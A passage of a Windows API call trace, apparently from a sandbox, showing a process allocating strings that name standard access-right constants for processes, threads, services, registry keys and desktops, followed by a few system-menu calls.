[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e5f0*="DELETE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e5e0*="READ_CONTROL") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e5d0*="WRITE_OWNER") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e5c0*="WRITE_DAC") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a2e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a2e5a0*="THREAD_IMPERSONATE") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a2e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0189.761] SysReAllocStringLen (in: pbstr=0x2a2e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a2e580*="THREAD_QUERY_INFORMATION") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a2e570*="THREAD_SET_INFORMATION") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a2e560*="THREAD_SET_CONTEXT") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a2e550*="THREAD_GET_CONTEXT") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a2e540*="THREAD_SUSPEND_RESUME") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a2e530*="THREAD_TERMINATE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a2e520*="THREAD_ALL_ACCESS") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e500*="STANDARD_RIGHTS_WRITE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e4f0*="STANDARD_RIGHTS_READ") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e4d0*="DELETE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e4c0*="READ_CONTROL") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e4b0*="WRITE_OWNER") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e4a0*="WRITE_DAC") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a2e490*="PROCESS_QUERY_INFORMATION") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a2e480*="PROCESS_SET_INFORMATION") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a2e470*="PROCESS_SET_QUOTA") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a2e460*="PROCESS_CREATE_PROCESS") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a2e450*="PROCESS_DUP_HANDLE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a2e440*="PROCESS_VM_WRITE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a2e430*="PROCESS_VM_READ") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a2e420*="PROCESS_VM_OPERATION") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a2e410*="PROCESS_SET_SESSIONID") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a2e400*="PROCESS_CREATE_THREAD") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a2e3f0*="PROCESS_TERMINATE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e3e0*="PROCESS_ALL_ACCESS") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e3b0*="STANDARD_RIGHTS_READ") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e390*="DELETE") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e380*="READ_CONTROL") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e370*="WRITE_OWNER") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e360*="WRITE_DAC") returned 1
[0189.762] SysReAllocStringLen (in: pbstr=0x2a2e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a2e350*="PERM_FILE_CREATE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a2e340*="PERM_FILE_WRITE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a2e330*="PERM_FILE_READ") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e310*="STANDARD_RIGHTS_WRITE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e300*="STANDARD_RIGHTS_READ") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e2e0*="DELETE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e2d0*="READ_CONTROL") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e2c0*="WRITE_OWNER") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e2b0*="WRITE_DAC") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a2e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a2e290*="PRINTER_ACCESS_USE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a2e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a2e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a2e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e250*="PRINTER_ALL_ACCESS") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a2e240*="PRINTER_EXECUTE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a2e230*="PRINTER_WRITE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a2e220*="PRINTER_READ") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e210*="PRINTER_ALL_ACCESS") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e200*="DELETE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e1f0*="READ_CONTROL") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e1e0*="WRITE_OWNER") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e1d0*="WRITE_DAC") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a2e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a2e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a2e1a0*="SC_MANAGER_LOCK") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a2e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a2e180*="SC_MANAGER_CONNECT") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a2e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a2e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e140*="STANDARD_RIGHTS_WRITE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e130*="STANDARD_RIGHTS_READ") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e120*="STANDARD_RIGHTS_ALL") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e110*="DELETE") returned 1
[0189.763] SysReAllocStringLen (in: pbstr=0x2a2e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e100*="READ_CONTROL") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e0f0*="WRITE_OWNER") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e0e0*="WRITE_DAC") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a2e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a2e0c0*="SERVICE_STOP") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a2e0b0*="SERVICE_START") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a2e0a0*="SERVICE_QUERY_STATUS") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a2e090*="SERVICE_QUERY_CONFIG") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a2e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a2e070*="SERVICE_INTERROGATE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a2e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a2e050*="SERVICE_CHANGE_CONFIG") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e040*="SERVICE_ALL_ACCESS") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e020*="STANDARD_RIGHTS_WRITE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e010*="STANDARD_RIGHTS_READ") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e000*="STANDARD_RIGHTS_ALL") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2dff0*="DELETE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2dfe0*="READ_CONTROL") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2dfd0*="WRITE_OWNER") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dfc0*="WRITE_DAC") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a2dfb0*="KEY_SET_VALUE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a2dfa0*="KEY_CREATE_LINK") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a2df90*="KEY_CREATE_SUB_KEY") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a2df80*="KEY_NOTIFY") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a2df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a2df60*="KEY_QUERY_VALUE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2df40*="STANDARD_RIGHTS_WRITE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a2df30*="STANDARD_RIGHTS_READ 2") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a2df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2df10*="DELETE") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2df00*="READ_CONTROL") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2def0*="WRITE_OWNER") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dee0*="WRITE_DAC") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a2ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0189.764] SysReAllocStringLen (in: pbstr=0x2a2dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a2dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a2deb0*="DESKTOP_JOURNALRECORD") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a2dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a2de90*="DESKTOP_HOOKCONTROL") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a2de80*="DESKTOP_CREATEWINDOW") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a2de70*="DESKTOP_CREATEMENU") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a2de60*="DESKTOP_READOBJECTS") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a2de50*="DESKTOP_ENUMERATE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2de30*="STANDARD_RIGHTS_WRITE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2de20*="STANDARD_RIGHTS_READ") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2de10*="STANDARD_RIGHTS_ALL") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2de00*="DELETE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ddf0*="READ_CONTROL") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2dde0*="WRITE_OWNER") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ddd0*="WRITE_DAC") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a2ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a2ddb0*="WINSTA_READSCREEN") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a2dda0*="WINSTA_READATTRIBUTES") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd90*=0x0, psz="WINSTA_EXITWINDOWS", len=0x12 | out: pbstr=0x2a2dd90*="WINSTA_EXITWINDOWS") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd80*=0x0, psz="WINSTA_ENUMERATE", len=0x10 | out: pbstr=0x2a2dd80*="WINSTA_ENUMERATE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd70*=0x0, psz="WINSTA_ENUMDESKTOPS", len=0x13 | out: pbstr=0x2a2dd70*="WINSTA_ENUMDESKTOPS") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd60*=0x0, psz="WINSTA_CREATEDESKTOP", len=0x14 | out: pbstr=0x2a2dd60*="WINSTA_CREATEDESKTOP") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd50*=0x0, psz="WINSTA_ACCESSGLOBALATOMS", len=0x18 | out: pbstr=0x2a2dd50*="WINSTA_ACCESSGLOBALATOMS") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd40*=0x0, psz="WINSTA_ACCESSCLIPBOARD", len=0x16 | out: pbstr=0x2a2dd40*="WINSTA_ACCESSCLIPBOARD") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd30*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2dd30*="STANDARD_RIGHTS_EXECUTE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd20*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2dd20*="STANDARD_RIGHTS_WRITE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd10*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2dd10*="STANDARD_RIGHTS_READ") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dd00*=0x0, psz="STANDARD_RIGHTS_REQUIRED", len=0x18 | out: pbstr=0x2a2dd00*="STANDARD_RIGHTS_REQUIRED") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dcf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2dcf0*="READ_CONTROL") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dce0*=0x0, psz="SI_ACCESS_SPECIFIC", len=0x12 | out: pbstr=0x2a2dce0*="SI_ACCESS_SPECIFIC") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dcd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dcd0*="WRITE_DAC") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dcc0*=0x0, psz="FILE_DELETE", len=0xb | out: pbstr=0x2a2dcc0*="FILE_DELETE") returned 1
[0189.765] SysReAllocStringLen (in: pbstr=0x2a2dcb0*=0x0, psz="FILE_DELETE_CHILD", len=0x11 | out: pbstr=0x2a2dcb0*="FILE_DELETE_CHILD") returned 1
[0189.767] SetClassLongA (hWnd=0xf01de, nIndex=-14, dwNewLong=65575) returned 0x0
[0189.767] GetSystemMenu (hWnd=0xf01de, bRevert=0) returned 0xd01e7
[0189.767] DeleteMenu (hMenu=0xd01e7, uPosition=0xf030, uFlags=0x0) returned 1
[0189.767] DeleteMenu (hMenu=0xd01e7, uPosition=0xf000, uFlags=0x0) returned 1
[0189.767] DeleteMenu (hMenu=0xd01e7, uPosition=0xf010, uFlags=0x0) returned 1
[0189.767] GetCurrentThreadId () returned 0x5a8
[0189.767] ResetEvent (hEvent=0xa0) returned 1
[0189.767] GetCurrentThreadId () returned 0x5a8
